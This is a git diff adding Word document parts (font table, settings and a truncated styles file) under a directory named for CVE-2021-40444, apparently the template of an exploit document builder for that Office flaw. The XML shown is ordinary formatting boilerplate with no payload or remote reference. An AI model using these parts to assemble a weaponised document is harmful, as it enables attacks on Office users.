new file mode 100644
index 0000000..26e2a1a
--- /dev/null
+++ b/CVE-2021-40444/data/word_dat/word/fontTable.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Trebuchet MS"><w:panose1 w:val="020B0603020202020204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="00000687" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="OpenSymbol"><w:altName w:val="Cambria"/><w:charset w:val="01"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="Liberation Sans"><w:altName w:val="Arial"/><w:charset w:val="01"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="Droid Sans Fallback"><w:panose1 w:val="00000000000000000000"/><w:charset w:val="00"/><w:family w:val="roman"/><w:notTrueType/><w:pitch w:val="default"/></w:font><w:font w:name="Droid Sans Devanagari"><w:altName w:val="Segoe UI"/><w:panose1 w:val="00000000000000000000"/><w:charset w:val="00"/><w:family w:val="roman"/><w:notTrueType/><w:pitch w:val="default"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E00006FF" w:usb1="420024FF" w:usb2="02000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>
\ No newline at end of file
diff --git a/CVE-2021-40444/data/word_dat/word/settings.xml b/CVE-2021-40444/data/word_dat/word/settings.xml
new file mode 100644
index 0000000..e1849a7
--- /dev/null
+++ b/CVE-2021-40444/data/word_dat/word/settings.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15 w16se w16cid"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:autoHyphenation/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="14"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="useWord2013TrackBottomHyphenation" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="00642844"/><w:rsid w:val="00642844"/><w:rsid w:val="007E0FA4"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US" w:eastAsia="" w:bidi=""/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w14:docId w14:val="74811FD2"/><w15:docId w15:val="{9951342C-DC33-4E0E-84C6-943EC8FBAAD2}"/></w:settings>
\ No newline at end of file
diff --git a/CVE-2021-40444/data/word_dat/word/styles.xml b/CVE-2021-40444/data/word_dat/word/styles.xml
new file mode 100644
index 0000000..fb5bc24
--- /dev/null
+++ b/CVE-2021-40444/data/word_dat/word/styles.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid"><w:docDefaults><w:rPrDefault><w:rPr><w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/><w:sz w:val="22"/><w:szCs w:val="22"/><w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/></w:rPr></w:rPrDefault><w:pPrDefault><w:pPr><w:suppressAutoHyphens/></w:pPr></w:pPrDefault></w:docDefaults><w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="375"><w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/><w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/><w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/><w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text" w:semiHidden="1" w:uiPriority="0" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/><w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/><w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/><w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Grid" w:semiHidden="1" w:uiPriority="59" w:unhideWhenUsed="1"/><w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/><w:lsdException w:name="Placeholder Text" w:semiHidden="1"/><w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/><w:lsdException w:name="Light Shading" w:uiPriority="60"/><w:lsdException w:name="Light List" w:uiPriority="61"/><w:lsdException w:name="Light Grid" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/><w:lsdException w:name="Medium List 1" w:uiPriority="65"/><w:lsdException w:name="Medium List 2" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/><w:lsdException w:name="Dark List" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading" w:uiPriority="71"/><w:lsdException w:name="Colorful List" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid" w:uiPriority="73"/><w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/><w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/><w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/><w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/><w:lsdException w:name="Revision" w:semiHidden="1"/><w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/><w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/><w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/><w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/><w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/><w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/><w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/><w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/><w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/><w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/><w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/><w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/><w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/><w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/><w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/><w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/><w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/><w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/><w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/><w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/><w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/><w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/><w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/><w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/><w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/><w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/><w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/><w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/><w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/><w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/><w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/><w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/><w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/><w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/><w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/><w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/><w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/><w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/><w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/><w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/><w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/><w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/><w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/><w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/><w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/><w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/><w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/><w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/><w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/><w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/><w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/><w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/><w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/><w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/><w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/><w:lsdException w:name="Plain Table 1" w:uiPriority="41"/><w:lsdException w:name="Plain Table 2" w:uiPriority="42"/><w:lsdException w:name="Plain Table 3" w:uiPriority="43"/><w:lsdException w:name="Plain Table 4" w:uiPriority="44"/><w:lsdException w:name="Plain Table 5" w:uiPriority="45"/><w:lsdException w:name="Grid Table Light" w:uiPriority="40"/><w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/><w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/><w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/><w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/><w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/><w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/><w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/><w:lsdException w:name="Grid Table 7 Colorful Accent 1" 